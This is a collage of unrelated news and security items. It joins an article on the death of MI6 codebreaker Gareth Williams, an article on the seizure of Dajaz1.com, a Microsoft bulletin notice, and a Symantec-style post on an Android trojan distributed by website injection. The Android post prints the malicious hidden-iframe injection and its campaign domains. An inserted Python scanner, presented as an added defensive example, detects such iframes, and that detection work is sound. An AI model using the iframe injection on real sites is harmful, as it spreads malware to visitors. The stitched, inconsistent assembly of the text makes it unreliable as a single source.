MI6 Codebreaker Attended U.S. Security Conference Before His Death

MI6 coder Gareth Williams captured by a surveillance camera before his death. Image: Courtesy of the Metropolitan Police

A top British codebreaker who died a mysterious death in his flat two years ago had just returned from a computer security conference in the United States before his death, according to information disclosed during an inquest this week.

The body of Gareth Williams, a codebreaker with Britain’s MI6 spy agency, was discovered stuffed into a sports bag in his bathtub on Aug. 23, 2010, though he’s believed to have been killed Aug. 15.

Williams had just returned to London on Aug. 11 after spending six weeks in the United States, where he attended the annual Black Hat security conference in Las Vegas as part of a contingent of British spies, according to witnesses who spoke at the inquest. He attended Black Hat in 2008 as well.

It’s believed Williams may have also attended Black Hat’s companion hacker conference, DefCon, which follows Black Hat and draws many of the same attendees. In 2010, Black Hat was held July 24 to 29, while DefCon ran from July 30 to Aug. 1.

Black Hat is one of the top security conferences in the world, targeting the professional security crowd, while DefCon is geared more specifically to hackers. Law enforcement agents, the military and intelligence officers regularly attend both conferences, often undercover, to keep pace with the latest research and learn what hackers are up to. They also recruit hackers for professional work.

DefCon holds an annual spot-the-fed contest to out undercover agents as a good-natured sport. Attendees who spot a fed receive an “I spotted a Fed” T-shirt, while the outed agent gets a trophy T-shirt of his own to take back to his office, sporting the phrase “I was spotted at DefCon.”

Not everyone wants to be outed or plays by the conference ground rules for working undercover. Several years ago, undercover agents believed to be working for Israel’s Mossad spy agency were kicked out of the conference after registering as journalists and posing as a French film crew from Canal Plus.

It’s not known specifically why Williams attended Black Hat or if he and his colleagues attended incognito. A Black Hat organizer did not immediately respond to a request for comment.

Williams, who was 31 when he died, was found inside a North Face nylon sports bag in the bathtub of his apartment. His nude body was in the fetal position, with his arms folded across his chest. The bag was closed with a padlock, and two keys to the padlock were found underneath Williams’ body inside the bag.

MI6 coder Gareth Williams attended the Black Hat security conference in the U.S. with fellow spies days before his mysterious death. Photo: Courtesy of the Metropolitan Police

His mobile phone and a number of SIM cards were laid out on a table nearby; the phone had been restored to its factory settings. There were no signs of forced entry to the apartment and no signs of a struggle.

Williams was described by those who knew him as a “math genius” who graduated from Bangor University at the age of 17 with a degree in mathematics. He’d begun his university studies while still in secondary school. In 2001 he joined Government Communications Headquarters (GCHQ), Britain’s listening post, helping to break coded Taliban communications, among other things. He was considered a “world-class intelligence officer” and had won two awards for codebreaking, according to his boss at GCHQ.

In 2009, he was loaned out to MI6, Britain’s foreign intelligence service, for a three-year stint, but asked to be transferred back to GCHQ after a year. He was preparing to move back to his old job around the time he was killed.

Williams had worked in a four-man team as an expert codebreaker and shortly before his death had been in contact with two secret agents working in the field in the U.K., according to testimony at the inquest.

The Daily Mail quoted anonymous sources last year saying that Williams had been working on secret technology to track stolen money being laundered through Britain by the Russian mafia. The technology was reportedly designed to allow MI6 agents to follow money from bank accounts in Russia to criminal gangs in Europe via internet and wire transfers.

He also worked on another secretive project to develop devices for stealing data from mobile phones and laptops using wireless technology.

“He was involved in a very sensitive project with the highest security clearance,” the anonymous source told the Daily Mail. “He was not an agent doing surveillance, but was very much part of the team, working on the technology side, devising stuff like software.”

The source indicated that Williams’ work to disrupt the Russian mafia could have put him at risk.

“Some of these powerful criminal networks have links with, and employ, former KGB agents who can track down people like Williams,” the source said.

Williams also had reportedly worked with the NSA and British intelligence to intercept e-mail messages that helped convict would-be bombers in the United Kingdom. He had made repeated visits to the United States to meet with the National Security Agency and worked closely with British and U.S. spy agencies to intercept and examine communications that passed between an al-Qaida official in Pakistan and three men who were convicted in 2009 of plotting to bomb transcontinental flights.

Investigators said during the inquest that there was no evidence Williams was killed as a result of the work he was doing, but they acknowledged that a full investigation had been thwarted by the spy agencies who employed Williams, raising suspicions that the agencies might have been involved in his death or at least know who was responsible for it.

Hours before he died, surveillance cameras captured Williams in London’s Knightsbridge neighborhood while he was shopping at the luxury department store Harrods. Williams was expected at work the next day, but never showed up. MI6 did not report him missing, however, until Aug. 23, at which point his body had decomposed, thwarting attempts to determine the precise cause of death.

The spy agencies also failed to hand over nine thumb drives found in Williams’ locker at work. The drives were released to investigators only this week. Other electronic equipment that Williams used at work was handed over to Scotland Yard investigators four days after Williams’ body was discovered, raising questions about whether the agencies had wiped the equipment before handing it over.

Family and friends testified that Williams was unhappy with his work environment at MI6 and felt he didn’t fit in with his colleagues. During the inquest, testimony revealed that the coder had conducted unauthorized searches of an MI6 database that could have put him at risk if he was discovered. Investigators said, however, that MI6 was apparently unaware that Williams had conducted the searches.

A coroner said at the inquest that while it appeared unlikely that British spy agencies played a role in the coder’s death, it was still a “legitimate line of inquiry” for the investigation.

Investigators found no fingerprints or any other evidence indicating someone had been with Williams the night he died, or that anyone beyond his family had ever been in his apartment. Investigators said at the inquest that small traces of incomplete DNA had been found on the tiny padlock that had been used to close the bag in which Williams’ body was stuffed. The only other DNA evidence found in the apartment that didn’t belong to Williams or his family was found on a green hand towel in the kitchen.

Authorities plan to take DNA evidence from 50 colleagues who worked with Williams at MI6 to determine if there is a match.

Feds Seized Hip-Hop Site for a Year, Waiting for Proof of Infringement

For more than a year, and without explanation, the government redirected hip-hop site Dajaz1.com to this landing page.

Federal authorities who seized a popular hip-hop music site based on assertions from the Recording Industry Association of America that it was linking to four “pre-release” music tracks gave it back more than a year later without filing civil or criminal charges because of apparent recording industry delays in confirming infringement, according to court records obtained by Wired.

The Los Angeles federal court records, which were unsealed Wednesday at the joint request of Wired, the Electronic Frontier Foundation and the First Amendment Coalition, highlight a secret government process in which a judge granted the government repeated time extensions to build a civil or criminal case against Dajaz1.com, one of about 750 domains the government has seized in the last two years in a program known as Operation in Our Sites.

Apparently, however, the RIAA and music labels’ evidence against Dajaz1, a music blog, never came. Or, if it did, it was not enough to build a case and the authorities returned the site nearly 13 months later without explanation or apology.

Cindy Cohn, the EFF’s legal director, said the site’s 13-month seizure by the Immigration and Customs Enforcement bureau highlights the RIAA’s influence over the government. President Barack Obama has tapped at least five former RIAA attorneys for senior positions in the Justice Department.

“Here you have ICE making a seizure, based on the say-so of the record company guys, and getting secret extensions as they wait for their masters, the record companies, for evidence to prosecute,” Cohn said in a telephone interview. “This is the RIAA controlling a government investigation and holding it up for a year.”

ICE, a branch of the Department of Homeland Security, has the power to seize web domains engaged in infringing activity under the same forfeiture laws used to seize property like houses, cars and boats allegedly tied to illegal activity such as drug running or gambling. But seizing a domain name raises First Amendment concerns, though nothing in the court records shows that the government or the court was concerned about the prolonged seizure of a site that is akin to an online printing press.

In the Dajaz1 case, the authorities seized the site in November 2010 on the word of the RIAA that four songs linked to on the site were unauthorized, the records show. Yet nearly a year later, in September 2011, the government was secretly seeking yet another extension to build its case, ostensibly because it was still waiting for the recording industry to produce evidence, the records show. All the while, the site’s owner and his attorney were left out of the loop, as the court record was sealed from them and the public. The Dajaz1 site was redirected to a government landing page saying it was seized by customs officials.

On Sept. 7, 2011, about 11 months after the government seized Andre Nasib’s site, a Department of Homeland Security agent wrote a declaration to U.S. District Judge Margaret Morrow of Los Angeles, explaining the reason for seeking a third time extension to build a case. The agent said “a sampling of content obtained from the Dajaz1.com website and its purported affiliate websites was submitted for rights holder evaluation and has yet to be returned.”

The agent, Andrew Reynolds, wrote virtually the exact same sentence in a July 13, 2011 declaration (.pdf), in which the government sought its second extension of time to build a case.

However, Reynolds’ declaration in September for the first time mentioned the RIAA by name.

“Additionally, a representative with the Recording Industry Association of America (RIAA) has stated that he will provide a very comprehensive statement to ICE’s and CBP’s [Customs and Border Protection’s] outstanding questions, in coordination with corresponding rights holders, which will be forthcoming in approximately 30 days,” Reynolds wrote. (.pdf)

Other than the unsealing orders won by Wired, EFF and the First Amendment Coalition, that Reynolds filing was the last one in the case — meaning the record does not say whether the RIAA or other industry players ever produced the promised report.

The Los Angeles federal prosecutor in the case, Steven Welk, did not respond for comment. Welk’s office agreed to unseal the documents, but said that it did so without conceding there was any First Amendment or common law necessity to do so. In December, when the site was returned, the authorities said it was “the appropriate and just result.”

The RIAA declined to comment on the unsealed documents, which Wired provided to it for review.

Instead, the industry lobbying group pointed Wired to its statement in December, when Dajaz1 was returned:

We understand that a decision was made that this particular site did not merit a criminal forfeiture proceeding. We respect that government agencies must consider a range of technical issues when exercising their independent prosecutorial discretion. Criminal proceedings are not always brought, for a variety of appropriate reasons.

With respect to Dajaz1, we would note that this particular website has specialized in the massive unauthorized distribution of pre-release music — arguably the worst and most damaging form of digital theft. […]

If the site continues to operate in an illegal manner, we will consider all our legal options to prevent further damage to the music community.

We are aware of statements by the site operator that suggest that music companies themselves were the source of at least some of the thousands of recordings available on Dajaz1. Even assuming this to be accurate, it does not excuse the thousands of other pre-release tracks also made available which were neither authorized for commercial distribution nor for uploading to publicly accessible sites where they were readily downloadable for free.

Dajaz1’s owner, Nasib, of New York, declined comment through his attorney, Andrew Bridges.

In December, Nasib told The New York Times that the recording industry offered him the four songs that were at the center of the case against him.

“It’s not my fault if someone at a record label is sending me the song,” the paper quoted him as saying.

The site’s seizure was based on an affidavit (.pdf) from Reynolds, who said he streamed or downloaded four songs hosted in cyberlockers — filezee.com and usershare.net — that were linked on Nasib’s site. The songs in question were “Deuces” by Chris Brown; “Fall for Your Type” by Jamie Foxx; “Long Gone” by Nelly and “Mechanics” by Reek Da Villian. Reynolds, in his seizure affidavit, wrote that he consulted with “RIAA representatives” when drafting the affidavit to verify that the songs were unauthorized.

Bridges said in a telephone interview that Nasib’s site, which is now up and running again, should never have been seized.

“To begin with,” Bridges said, “I don’t think there was any evidence of criminal copyright infringement.”

Microsoft Releases Advanced Notification for May Security Bulletin

Microsoft has published a Security Bulletin Advanced Notification indicating that its May release will contain seven bulletins. The bulletins carry severity ratings of critical and important and cover Microsoft Windows, Office, .NET Framework, and Silverlight. Release of these bulletins is scheduled for Tuesday, May 8, 2012.

US-CERT will provide additional information as it becomes available.


Website Injection-Campaign Used in Conjunction with an Android Trojan

Back in December of 2011, Symantec identified the first case of an Android threat used in conjunction with a website-injection campaign targeting sites in the Middle East. Android.Arspam was an Android Trojan that redirected users to sites where a hacktivist message was being delivered.

Today another website-injection campaign involving Android has come to light; this time, the campaign distributes a mobile threat. It is not a typical drive-by download, in which the application is installed automatically through an exploit. Instead, the user is prompted to install the application after it has been downloaded.

The campaign was first reported by the owner of an infected site on a social-bookmarking website, and multiple sites have since emerged with a URL redirect injected into the HTML body of an infected page. Reminiscent of Android.Bgserv, a malicious version of a Google security patch discovered by Symantec last year, the Trojan is delivered as a fake security package. Devices that allow installation from 'Unknown Sources' are the most susceptible to this type of attack, and even on those devices the user has to manually accept the permissions and prompts presented before installation.

The following domains have been identified so far based on our investigation:

  • [http://]androidbia.info
  • [http://]androidjea.info
  • [http://]gaoanalitics.info
  • [http://]androidonlinefix.info

The website injection is of the form:

<iframe style="visibility: hidden; display: none; display: none;"
src="[http://]gaoanalitics.info/?id=[CLSID]">;
</iframe>

This injection has been identified not only in HTML pages but also in robots.txt files, which suggests that every file on a compromised web server may have this iframe appended to it.
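As an added defensive example (not code from the Symantec write-up), a small Python scanner that flags iframes like the one above across a web root's files, including non-HTML files such as robots.txt, by looking for hide-me styling, the campaign domains listed above, and iframes in files that should contain no HTML at all. The sample file contents are constructed; the domain list is the one given in the text.

```python
import re
from dataclasses import dataclass

# Constructed sample files standing in for a compromised web root.
SAMPLE_FILES = {
    "index.html": "<html><body><p>Welcome</p>\n"
                  '<iframe style="visibility: hidden; display: none; display: none;" '
                  'src="http://gaoanalitics.info/?id=ABC123"></iframe>\n</body></html>',
    "robots.txt": "User-agent: *\nDisallow: /admin\n"
                  '<iframe style="visibility: hidden; display: none;" '
                  'src="http://androidbia.info/?id=ABC123"></iframe>\n',
    # A benign embed that must not be flagged.
    "about.html": '<html><body><iframe src="https://www.youtube.com/embed/xyz" '
                  'width="560"></iframe></body></html>',
}

# Campaign domains named in the write-up.
KNOWN_HOSTS = {"androidbia.info", "androidjea.info",
               "gaoanalitics.info", "androidonlinefix.info"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
STYLE_RE = re.compile(r"""style\s*=\s*["']([^"']*)["']""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

@dataclass
class Finding:
    path: str
    host: str
    reasons: tuple

def host_of(url):
    """Return the lowercased host part of an absolute or protocol-relative URL."""
    m = re.match(r"(?:https?:)?//([^/?#]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else ""

def scan_text(path, text):
    """Return a Finding for every suspicious iframe tag in one file's contents."""
    findings = []
    for tag in IFRAME_RE.finditer(text):
        tag_text = tag.group(0)
        src = SRC_RE.search(tag_text)
        host = host_of(src.group(1)) if src else ""
        style = STYLE_RE.search(tag_text)
        reasons = []
        if style and HIDDEN_RE.search(style.group(1)):
            reasons.append("hidden iframe")
        if host in KNOWN_HOSTS:
            reasons.append("known campaign host")
        if not path.lower().endswith((".html", ".htm")):
            reasons.append("iframe in non-HTML file")
        if reasons:
            findings.append(Finding(path, host, tuple(reasons)))
    return findings

def scan_files(files):
    """Scan a {path: contents} mapping and collect all findings."""
    return [f for path, text in files.items() for f in scan_text(path, text)]
```

Run against a real web root by reading each file into the mapping; a hit on a file that should never contain markup is the strongest signal of the append-everything behaviour described above.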

The payload itself is not complicated to understand: it is not obfuscated and consists of just a few simple proxy and socket routines that the threat's author can use to route traffic from an infected device to an external source. The real concern lies not in its immediate functionality but in what it could do on behalf of an external party. As called out in the latest Symantec ISTR report, threats like these represent a change in strategy by malware developers, moving away from traditional “smash-and-grab” jobs such as premium-SMS scams toward more sophisticated schemes such as privacy violations, theft of sensitive content for use in extortion rackets, and click-jacking.

Norton Safeweb technology blocks this attack before the application even starts downloading, unlike some other mobile security suites that rely solely on detecting threats after the download or during installation. Symantec currently detects this threat as Android.Notcompatible.

With Bring Your Own Device (BYOD) adoption increasing astronomically, threats like these represent a paradigm shift in mobile malware. Although the number of sites compromised so far is small, the campaign opens up the possibility of large-scale web-injection attacks being used to distribute malicious mobile applications.